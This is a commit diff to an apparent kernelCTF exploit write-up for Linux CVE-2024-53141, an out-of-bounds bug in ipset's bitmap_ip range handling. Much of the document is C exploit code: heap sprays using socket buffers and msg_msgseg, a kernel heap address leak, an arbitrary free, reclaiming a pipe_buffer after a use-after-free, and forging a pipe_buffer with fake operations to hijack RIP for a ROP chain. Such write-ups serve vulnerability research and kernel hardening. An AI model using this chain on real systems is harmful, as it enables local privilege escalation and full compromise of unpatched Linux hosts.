
Commit 4613ed6

Update exploit.md
1 parent 7f1bd92 commit 4613ed6

1 file changed: pocs/linux/kernelctf/CVE-2024-53141_lts/docs/exploit.md (+21 −11)
@@ -11,39 +11,41 @@ static int
bitmap_ip_uadt(struct ip_set *set, struct nlattr *tb[],
	       enum ipset_adt adt, u32 *lineno, u32 flags, bool retried)
{
	if (ip < map->first_ip || ip > map->last_ip) // [1]
		return -IPSET_ERR_BITMAP_RANGE;
	...
	if (tb[IPSET_ATTR_IP_TO]) {
		ret = ip_set_get_hostipaddr4(tb[IPSET_ATTR_IP_TO], &ip_to);
		if (ret)
			return ret;
		if (ip > ip_to) {
			swap(ip, ip_to);
			if (ip < map->first_ip) // [2]
				return -IPSET_ERR_BITMAP_RANGE;
		}
	} else if (tb[IPSET_ATTR_CIDR]) {
		u8 cidr = nla_get_u8(tb[IPSET_ATTR_CIDR]);
		...
		ip_set_mask_from_to(ip, ip_to, cidr); // [3]
	} else {
		ip_to = ip;
	}

	if (ip_to > map->last_ip) // [4]
		return -IPSET_ERR_BITMAP_RANGE;

	for (; !before(ip_to, ip); ip += map->hosts) { // [5]
		e.id = ip_to_id(map, ip);
		ret = adtfn(set, &e, &ext, &ext, flags);
```

When `tb[IPSET_ATTR_IP_TO]` is not present but `tb[IPSET_ATTR_CIDR]` is, `ip` and `ip_to` are calculated via `ip_set_mask_from_to` based on `tb[IPSET_ATTR_CIDR]`. This can produce an `ip` that is smaller than `map->first_ip`, and `ip` is never checked again after that.

For example, suppose `map->first_ip` is `0xffffffcb` and `map->last_ip` is `0xffffffff`, and we pass `IPSET_ATTR_IP` with value `0xffffffff` and `IPSET_ATTR_CIDR` with `3`. After [3], `ip` becomes `0xe0000000` and `ip_to` becomes `0xffffffff`; this passes the checks at [1] and [4] and proceeds to [5]. The loop at [5] can therefore iterate over IPs outside the allocated range (`map->first_ip` through `map->last_ip`).
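
As a quick sanity check of that arithmetic, here is a small userspace sketch that replays the masking done by `ip_set_mask_from_to` (mask `ip` down to the CIDR boundary, then fill the host bits for `ip_to`) together with checks [1] and [4]. The `hostmask()` helper is a re-implementation for illustration only, not the kernel's; the constants are the ones from the example above.

```c
#include <stdint.h>
#include <stdio.h>

/* Illustrative stand-in for ip_set_hostmask(): top `cidr` bits set. */
static uint32_t hostmask(uint8_t cidr)
{
	return cidr ? ~((1u << (32 - cidr)) - 1) : 0;
}

int main(void)
{
	uint32_t first_ip = 0xffffffcb, last_ip = 0xffffffff; /* set range        */
	uint32_t ip = 0xffffffff;                             /* IPSET_ATTR_IP    */
	uint8_t cidr = 3;                                     /* IPSET_ATTR_CIDR  */

	/* Check [1] runs on the un-masked ip and passes. */
	if (ip < first_ip || ip > last_ip)
		return puts("rejected at [1]");

	/* [3]: ip_set_mask_from_to(ip, ip_to, cidr) */
	ip &= hostmask(cidr);
	uint32_t ip_to = ip | ~hostmask(cidr);

	/* Check [4] only looks at ip_to, so it passes as well. */
	if (ip_to > last_ip)
		return puts("rejected at [4]");

	/* Prints: loop [5] runs ip from 0xe0000000 to 0xffffffff */
	printf("loop [5] runs ip from %#x to %#x, below first_ip %#x\n",
	       ip, ip_to, first_ip);
	return 0;
}
```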

# Primitives

`adtfn` resolves to the `bitmap_ip_add` function (defined as `mtype_add` in `net/netfilter/ipset/ip_set_bitmap_gen.h`; `mtype` is simply a macro that expands to `bitmap_ip`). It fetches the extension `x` from `map->extensions`, using `e.id` as the index.

```c
#define get_ext(set, map, id) ((map)->extensions + ((set)->dsize * (id)))
@@ -57,14 +59,17 @@ mtype_add(struct ip_set *set, void *value, const struct ip_set_ext *ext,
	int ret = mtype_do_add(e, map, flags, set->dsize);
```
`e.id` comes from `ip_to_id` in the previous function; by crafting this `id`, we can make the later operations on `x` go out of bounds.

```c
static u32
ip_to_id(const struct bitmap_ip *m, u32 ip)
{
	return ((ip & ip_set_hostmask(m->netmask)) - m->first_ip) / m->hosts;
}
```
We can also control the size of the map (the `bitmap_ip` object) by choosing `first_ip` and `last_ip` when we initially create the ip set.
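
To see where the resulting index lands, the sketch below redoes the `ip_to_id` arithmetic for the example range (53 elements, so valid ids are 0–52), assuming the default `netmask` of 32 and `hosts == 1`. The element id on this add path is held in a 16-bit field (`struct bitmap_ip_adt_elem`), so only the low 16 bits survive; `dsize` here is just a placeholder.

```c
#include <stdint.h>
#include <stdio.h>

/* Userspace replay of ip_to_id() for netmask 32 / hosts == 1:
 * the u32 subtraction wraps around when ip < first_ip. */
static uint32_t ip_to_id(uint32_t first_ip, uint32_t ip)
{
	return ip - first_ip;
}

int main(void)
{
	uint32_t first_ip = 0xffffffcb, last_ip = 0xffffffff;
	uint32_t elements = last_ip - first_ip + 1;  /* 53: valid ids are 0..52  */
	size_t dsize = 0x28;                         /* placeholder extension size */

	for (uint32_t ip = 0xe0000000; ip < 0xe0000003; ip++) {
		uint16_t id = (uint16_t)ip_to_id(first_ip, ip); /* e.id is u16 */
		printf("ip=%#x -> id=%u (valid ids < %u), extension offset %#zx\n",
		       ip, (unsigned)id, (unsigned)elements, dsize * id);
	}
	return 0;
}
```

The first wrapped `ip` already maps to id 53, the first slot past the in-bounds extension area, and each further loop iteration moves the write target another `set->dsize` bytes forward, which is what lets the OOB writes below reach neighbouring heap objects.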

## OOB Write to Kernel Heap Leak
By crafting `e.id`, this becomes an OOB write. For example, when we set a comment on a set entry, it can spill a kernel heap address into the next chunk, because the `comment` extension that `ip_set_init_comment` writes to is outside the allocation.
```c
static int
@@ -87,7 +92,11 @@ ip_set_init_comment(struct ip_set *set, struct ip_set_comment *comment,
	rcu_assign_pointer(comment->c, c);
}
```
This is the path we use to leak a kernel heap address: by shaping the heap as `..[skbuff][bitmap_ip][skbuff][skbuff]..`, the OOB write of the kernel address spills into the next chunk, which is a socket buffer.

In this step our exploit works in kmalloc-cg-1024: we allocate the `bitmap_ip` there and spray socket buffers into kmalloc-cg-1024. `ip_set_init_comment` then spills a kernel heap address (pointing to a kmalloc-192 object) into one of the socket buffers.

By receiving the socket buffers, we obtain a kernel heap address to use in the next step of the exploitation.
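
A minimal sketch of that socket-buffer spray and of fishing the leak back out, assuming (as above) that a datagram whose skb data allocation rounds up to 1024 bytes lands in kmalloc-cg-1024 next to the `bitmap_ip`; `NR_SOCKS`, `PAYLOAD_SZ`, and the helper names are illustrative and would need tuning on the target kernel.

```c
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define NR_SOCKS   64   /* illustrative spray width */
#define PAYLOAD_SZ 512  /* assumption: payload + skb overhead rounds to 1024 */

static int spray_fds[NR_SOCKS][2];

/* Queue one datagram per socketpair so its data buffer sits in the
 * same 1024-byte slab as the victim bitmap_ip. */
static void spray_skbs(void)
{
	char payload[PAYLOAD_SZ];

	memset(payload, 'A', sizeof(payload));
	for (int i = 0; i < NR_SOCKS; i++) {
		socketpair(AF_UNIX, SOCK_DGRAM, 0, spray_fds[i]);
		write(spray_fds[i][0], payload, sizeof(payload));
	}
}

/* After the OOB comment write, receive every queued datagram and scan
 * it for an 8-byte value that looks like a kernel heap pointer. */
static int find_leak(unsigned long *leak)
{
	char buf[PAYLOAD_SZ];

	for (int i = 0; i < NR_SOCKS; i++) {
		if (read(spray_fds[i][1], buf, sizeof(buf)) <= 0)
			continue;
		for (size_t off = 0; off + 8 <= sizeof(buf); off += 8) {
			unsigned long v;
			memcpy(&v, buf + off, sizeof(v));
			/* crude check: top 16 bits set => kernel address */
			if ((v & 0xffff000000000000UL) == 0xffff000000000000UL) {
				*leak = v;
				return 0;
			}
		}
	}
	return -1;
}
```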

## OOB Write Arbitrary Value
Another type of OOB write we can use is one with an arbitrary value. This works with a set that has the `counter` extension.
@@ -135,9 +144,10 @@ void free_msg(struct msg_msg *msg)
	}
}
```
In this step we work in kmalloc-cg-2048: we allocate the `bitmap_ip` there and spray `msg_msgseg` objects into kmalloc-cg-2048. The victim object (`struct bitmap_ip`) is allocated with `GFP_KERNEL_ACCOUNT`, so it is guaranteed to live in the same slab cache as the `msg_msgseg` objects. We therefore place the `bitmap_ip` right before a `msg_msgseg`, then perform the OOB write to put an arbitrary value into `msg_msgseg.next`.
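
A sketch of the `msg_msgseg` spray for this step. It relies on the usual System V message trick: a message larger than one page minus the `msg_msg` header is split, and the size of the tail segment decides which slab it lands in. `NR_QUEUES`, `DATALEN_MSG`, and `SEG_DATA` below are assumptions chosen so the segment allocation rounds up to 2048 bytes, not the exploit's exact values.

```c
#include <string.h>
#include <sys/ipc.h>
#include <sys/msg.h>

#define NR_QUEUES   32
/* Roughly PAGE_SIZE - sizeof(struct msg_msg) = 4096 - 48 bytes stay in
 * the msg_msg itself; everything beyond that goes into a msg_msgseg. */
#define DATALEN_MSG 4048
/* ~2000 bytes of segment data plus the small segment header rounds the
 * msg_msgseg allocation up to the 2048-byte slab. */
#define SEG_DATA    2000

struct spray_msg {
	long mtype;
	char mtext[DATALEN_MSG + SEG_DATA];
};

static int qids[NR_QUEUES];

/* Spray msg_msgseg objects into kmalloc-cg-2048 so one of them ends up
 * right behind the victim bitmap_ip; its ->next pointer is what the
 * counter-based OOB write later overwrites. */
static void spray_msgseg(void)
{
	struct spray_msg msg = { .mtype = 1 };

	memset(msg.mtext, 'B', sizeof(msg.mtext));
	for (int i = 0; i < NR_QUEUES; i++) {
		qids[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0600);
		msgsnd(qids[i], &msg, sizeof(msg.mtext), 0);
	}
}
```

Receiving such a message later makes `free_msg()` walk the segment list and free whatever `msg_msgseg.next` now points to, which is how the arbitrary free described next is triggered.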
For the arbitrary free we choose `pipe_buffer` as the next victim object, because it is familiar to us and makes the next steps easy to plan. However, our kernel heap leak primitive only leaks a buffer in a generic kernel cache (kmalloc-192), so we have to guess a little to obtain a `pipe_buffer` address located in an accounted cache. From our observation, computing `leak_addr & ~(0x10000000 - 1)` (where `leak_addr` is the kernel heap address leaked from the kmalloc-192 chunk) lets us guess a `pipe_buffer` address with reasonable confidence.
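
Read literally, that formula aligns the leak down to a 256 MiB boundary. A tiny illustration, with a made-up leak value, of how we interpret it:

```c
#include <stdint.h>

/* Align the kmalloc-192 leak down to a 256 MiB boundary, e.g.
 * 0xffff9a8c4d2e1940 -> 0xffff9a8c40000000 (made-up example value);
 * the pipe_buffer guess is then derived relative to that base. */
static uint64_t guess_base(uint64_t leak_addr)
{
	return leak_addr & ~((uint64_t)0x10000000 - 1);
}
```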

## Use-After-Free to Control RIP
At this point we have already freed a `pipe_buffer` via the arbitrary free. Next, we reclaim the victim `pipe_buffer` with socket buffers: we spray socket buffers and hope one of them is placed at the same address as the `pipe_buffer`. Then we write to the pipe, which fills one of our socket buffers with the `pipe_buffer` contents.
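
A sketch of how the overlap can be confirmed, assuming the sprayed socket-buffer data now backs the pipe's `pipe_buffer` array: after the pipe write, one of our payloads contains a populated `struct pipe_buffer`, so receiving the sprayed buffers and scanning for a kernel pointer in the `ops` slot identifies it (and leaks a pointer usable against KASLR). The struct layout is written out by hand here and, like `find_overlap` and its parameters, is an assumption.

```c
#include <stdint.h>
#include <string.h>
#include <unistd.h>

/* Hand-written mirror of struct pipe_buffer's layout (x86_64):
 * page, offset, len, ops, flags, private. */
struct pipe_buffer_view {
	uint64_t page;
	uint32_t offset, len;
	uint64_t ops;      /* becomes a kernel pointer once the pipe is written */
	uint32_t flags;
	uint32_t pad;
	uint64_t private_;
};

/* Receive each sprayed skb and look for a populated pipe_buffer. */
static int find_overlap(int (*socks)[2], int nr, struct pipe_buffer_view *out)
{
	char buf[1024];

	for (int i = 0; i < nr; i++) {
		ssize_t n = read(socks[i][1], buf, sizeof(buf));
		if (n < (ssize_t)sizeof(*out))
			continue;
		for (ssize_t off = 0; off + (ssize_t)sizeof(*out) <= n; off += 8) {
			struct pipe_buffer_view pb;
			memcpy(&pb, buf + off, sizeof(pb));
			/* a kernel pointer in ops plus a sane len marks the hit */
			if ((pb.ops >> 48) == 0xffff && pb.len != 0) {
				*out = pb;
				return i; /* this socket overlaps the pipe_buffer */
			}
		}
	}
	return -1;
}
```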
@@ -148,7 +158,7 @@ Controlling RIP, we simply free the that socket buffer and reallocate with new o

# Control RIP to ROP Chain
We reach this code path, where we control all the fields of `pipe_buffer`:
```c
static inline void pipe_buf_release(struct pipe_inode_info *pipe,
				    struct pipe_buffer *buf)
{
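```

To turn this into RIP control, the reclaiming socket buffer is refilled with a crafted `pipe_buffer` whose `ops` field points at a fake `pipe_buf_operations` table placed at a known (leaked or guessed) address, so that releasing the buffer calls our chosen gadget through `buf->ops->release`. The sketch below only lays out such a payload; `build_payload`, `fake_ops_addr`, `pivot_gadget`, `leaked_page`, and the hand-written struct layouts are assumptions resolved by the earlier leak steps, not values from the original write-up.

```c
#include <stdint.h>
#include <string.h>

/* Hand-written mirrors of the two kernel structs we forge; the field
 * order follows struct pipe_buf_operations / struct pipe_buffer. */
struct fake_pipe_buf_operations {
	uint64_t confirm;
	uint64_t release;   /* pipe_buf_release() calls this -> RIP control */
	uint64_t try_steal;
	uint64_t get;
};

struct fake_pipe_buffer {
	uint64_t page;
	uint32_t offset, len;
	uint64_t ops;       /* points at the sprayed fake ops table */
	uint32_t flags;
	uint32_t pad;
	uint64_t private_;
};

/* Build the payload that the respray writes over the freed pipe_buffer.
 * fake_ops_addr: address where the fake ops table will sit (derived
 * from the heap leak); pivot_gadget: first ROP gadget, a kernel text
 * address obtained from the earlier leak. */
static size_t build_payload(uint8_t *out, uint64_t fake_ops_addr,
			    uint64_t pivot_gadget, uint64_t leaked_page)
{
	struct fake_pipe_buf_operations ops = { .release = pivot_gadget };
	struct fake_pipe_buffer pb = {
		.page = leaked_page,   /* keep a plausible page pointer */
		.ops  = fake_ops_addr,
	};

	memcpy(out, &pb, sizeof(pb));
	/* Ship the fake ops table in the same payload so it sits at a
	 * predictable offset from the leaked heap address. */
	memcpy(out + sizeof(pb), &ops, sizeof(ops));
	return sizeof(pb) + sizeof(ops);
}
```

Releasing the buffer (for example by closing the pipe) then reaches `pipe_buf_release()` above with `buf->ops->release` under our control.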
